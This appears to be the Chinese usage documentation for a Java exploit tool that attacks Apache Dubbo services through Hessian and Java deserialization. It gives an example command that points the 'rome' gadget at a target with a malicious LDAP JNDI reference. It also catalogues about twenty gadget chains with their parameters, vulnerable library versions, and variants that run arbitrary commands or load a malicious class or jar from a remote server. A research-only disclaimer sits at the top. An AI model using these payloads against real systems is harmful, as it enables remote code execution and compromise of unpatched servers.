工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责
usage: java -jar exp.jar [OPTION]
- -h 帮助信息
- -list 输出所有payload信息
- -p payload名称
- -param payload入参
- -protocol [dubbo] 通讯协议名称,默认缺省dubbo
- -s [hessian|java] 序列化类型,默认缺省hessian
- -t 目标,例:127.0.0.1:20880
例:
java -jar dubbo-exp.jar
-t
127.0.0.1:20881
-protocol
dubbo
-s
hessian
-p
rome
-param
ldap://127.0.0.1:43658/Calc
- 名称:resin
- 需要入参数量:2
- 参数说明:arg[0]=恶意类所在web服务器ip,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
- 序列化类型:hessian
- 依赖:com.caucho:quercus:*
- 名称:rome
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:hessian
- 依赖:com.rometools:rome:*
- 名称:spring-aop
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:hessian
- 依赖:org.springframework:spring-aop
- 名称:xbean
- 需要入参数量:2
- 参数说明:arg[0]=恶意类所在web服务器ip,arg[1]=恶意类类名,此处需要恶意类无包名编译出来的
- 序列化类型:hessian
- 依赖:org.apache.xbean:xbean-naming:*
- 名称:CommonsBeanutils
- 需要入参数量:1
- 参数说明:arg[0]=ldap引用外部class地址,例:ldap://127.0.0.1:43658/Calc(ldap协议的JNDI服务可打jdk8u191及以下版本,大于jdk8u191需要使用gadget字节码)
- 序列化类型:java
- 依赖:
- 名称:CommonsBeanutils1
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-beanutils:commons-beanutils:1.9.2
- 名称:CommonsCollections1
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections2
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:org.apache.commons:commons-collections4:4.0
- 名称:CommonsCollections3
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections3ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections4
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections5
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections5ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections6
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections6ForLoadJar
- 需要入参数量:2
- 参数说明:arg[0]=jar包下载地址,arg[1]=jar包中恶意类名称
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections7
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections8
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:org.apache.commons:commons-collections4:4.0
- 名称:CommonsCollections9
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections10
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.1
- 名称:CommonsCollections11
- 需要入参数量:1
- 参数说明:arg[0]=cmd
- 序列化类型:java
- 依赖:commons-collections:commons-collections:3.2.1
- 名称:URLDNS
- 需要入参数量:1
- 参数说明:arg[0]=dns server url
- 序列化类型:java
- 依赖: